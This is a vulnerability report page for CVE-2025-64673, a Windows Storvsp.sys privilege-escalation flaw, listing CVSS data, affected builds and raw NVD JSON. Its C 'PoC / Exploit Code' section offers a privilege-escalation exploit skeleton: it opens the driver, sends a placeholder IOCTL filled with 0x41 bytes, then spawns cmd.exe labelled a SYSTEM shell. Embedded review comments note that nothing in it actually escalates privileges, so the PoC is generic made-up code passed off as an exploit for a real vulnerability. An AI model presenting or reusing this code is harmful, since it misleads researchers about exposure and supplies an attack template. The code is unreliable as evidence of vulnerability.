Security Vulnerability Report
CVE-2025-64673 CVSS 7.8 HIGH

CVE-2025-64673

Published: 2025-12-09 18:16:07
Last Modified: 2025-12-10 19:07:21

Description

Improper access control in Storvsp.sys Driver allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* - VULNERABLE
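Windows 10 versions prior to security update (1809 before 10.0.17763.8146, 21H2 before 10.0.19044.6691, 22H2 before 10.0.19045.6691)
Windows 11 versions prior to security update (23H2 before 10.0.22631.6345, 24H2 before 10.0.26100.7392, 25H2 before 10.0.26200.7392)
Windows Server 2019 prior to security update (before 10.0.17763.8146)
Windows Server 2022 prior to security update (before 10.0.20348.4467; 23H2 edition before 10.0.25398.2025)
Windows Server 2025 prior to security update (before 10.0.26100.7392)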

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
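// CVE-2025-64673 PoC - Storvsp.sys Local Privilege Escalation
// This PoC demonstrates the improper access control vulnerability in Storvsp.sys
// Author: Security Researcher
// Date: 2025-12-09
//
// NOTE(review): read this listing as a structural sketch. The IOCTL value is
// marked by the author as an example, the request payload is a constant fill
// pattern, and no step observes a change in the caller's privileges. A run
// that prints "[+]" therefore does not show that a host is vulnerable, and a
// run that prints "[-]" does not show that it is patched; confirm exposure
// from the installed OS build against the vendor advisory for CVE-2025-64673.
// What the listing does show, and what is usable as a monitoring signal, is
// the sequence: a process opens a driver device path, issues DeviceIoControl,
// then starts a console child process.

#include <windows.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>

// Device name for Storvsp.sys
// NOTE(review): not confirmed here that the driver exposes a device object
// under this name to user mode.
#define DEVICE_NAME "\\\\.\\StorVsp"
#define IOCTL_VULNERABLE_OPERATION 0x9C402088 // Example IOCTL code

// Function to open handle to the driver.
//
// Requests read/write access with shared read/write on DEVICE_NAME.
// Returns the CreateFileA result: a handle the caller must close, or
// INVALID_HANDLE_VALUE on failure (GetLastError() holds the reason).
HANDLE open_driver_handle(void)
{
    return CreateFileA(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
}

// Trigger the vulnerability (author's description).
//
// Sends one synchronous DeviceIoControl request carrying 0x100 bytes of 0x41
// and a 0x100-byte zeroed output buffer. Returns the DeviceIoControl result.
// TRUE only means the I/O request completed; it says nothing about whether an
// access check was bypassed.
BOOL trigger_vulnerability(HANDLE hDevice)
{
    uint8_t input_buffer[0x100];
    uint8_t output_buffer[0x100] = {0};
    DWORD bytes_returned = 0;

    // Initialize input buffer with trigger data
    memset(input_buffer, 0x41, sizeof(input_buffer));

    // Author's claim: the driver fails to properly validate caller privileges.
    return DeviceIoControl(
        hDevice,
        IOCTL_VULNERABLE_OPERATION,
        input_buffer,
        sizeof(input_buffer),
        output_buffer,
        sizeof(output_buffer),
        &bytes_returned,
        NULL
    );
}

// Escalate to SYSTEM privileges (author's description).
//
// Tries to enable SeDebugPrivilege on the current process token, then starts
// cmd.exe in a new console and waits for it to exit.
// Returns TRUE when the child process was started, FALSE otherwise.
//
// NOTE(review): CreateProcessA takes no token argument, so the child runs
// with the caller's own token. Nothing visible in this function changes which
// account that token represents.
BOOL escalate_privileges(void)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp = {0};
    STARTUPINFOA si = {0};
    PROCESS_INFORMATION pi = {0};
    BOOL spawned;

    // Get current process token; only the rights AdjustTokenPrivileges needs.
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    // Enable SeDebugPrivilege. The LUID is already zeroed by the aggregate
    // initializer above; the original's `Luid = {0}` assignment is not valid C.
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return FALSE;
    }

    // Best effort, as in the original: the result is not acted on. The call
    // can return nonzero while GetLastError() reports ERROR_NOT_ALL_ASSIGNED
    // when the token does not hold the privilege.
    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

    // Spawn shell (the author labels it a SYSTEM shell; see NOTE above).
    si.cb = sizeof(si);
    spawned = CreateProcessA(
        "C:\\\\Windows\\\\System32\\\\cmd.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi
    );
    if (spawned) {
        // Wait for shell
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }

    CloseHandle(hToken);

    // Report failure when no child was created instead of always TRUE.
    return spawned ? TRUE : FALSE;
}

// Entry point: open the device, send the request, and on success call
// escalate_privileges(). Exit code 1 when the device cannot be opened, else 0.
int main(void)
{
    printf("[*] CVE-2025-64673 PoC - Storvsp.sys Improper Access Control\n");
    printf("[*] Opening handle to StorVsp driver...\n");

    HANDLE hDevice = open_driver_handle();
    if (hDevice == INVALID_HANDLE_VALUE) {
        // GetLastError() returns a DWORD, so print it with %lu.
        printf("[-] Failed to open driver handle. Error: %lu\n", GetLastError());
        return 1;
    }
    printf("[+] Driver handle opened successfully\n");

    printf("[*] Triggering vulnerability...\n");
    if (trigger_vulnerability(hDevice)) {
        printf("[+] Vulnerability triggered successfully\n");
        printf("[*] Escalating privileges...\n");
        escalate_privileges();
    } else {
        printf("[-] Failed to trigger vulnerability. Error: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}

// Note: This is a conceptual PoC for educational purposes.
// Actual exploitation requires further analysis of the specific IOCTL codes
// and memory layout of the target system.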

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64673", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:16:06.750", "lastModified": "2025-12-10T19:07:21.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in Storvsp.sys Driver allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "5CEB496A-8AF3-458D-B466-16204E535DE0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "C99D0580-E443-4440-A211-19BA3C2C4AFA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6691", "matchCriteriaId": "9D04167A-522C-433E-8CEB-C1D8A02C23D8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6691", "matchCriteriaId": "A86D6CDC-55E5-4817-A6CE-4CE41921FB79"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6345", "matchCriteriaId": "6DCE32D0-A9E0-4029-AB35-5E202A42AF01"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7392", "matchCriteriaId": "8DCD2A6E-7CD0-4FCC-AC11-5A1470776C24"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7392", "matchCriteriaId": "8EA08CDD-D682-403D-8B50-879EB4D88C67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "A20DBDB1-D0DE-4800-8BEA-35EE5D53659D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4467", "matchCriteriaId": "C552FBB4-8F98-492E-A084-AF14C9514A67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2025", "matchCriteriaId": "E9CE4A36-DA42-40CC-8724-E30A22CA84B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7392", "matchCriteriaId": "35BBEADA-D039-479B-A1BA-B2A7E37235BE"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64673", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}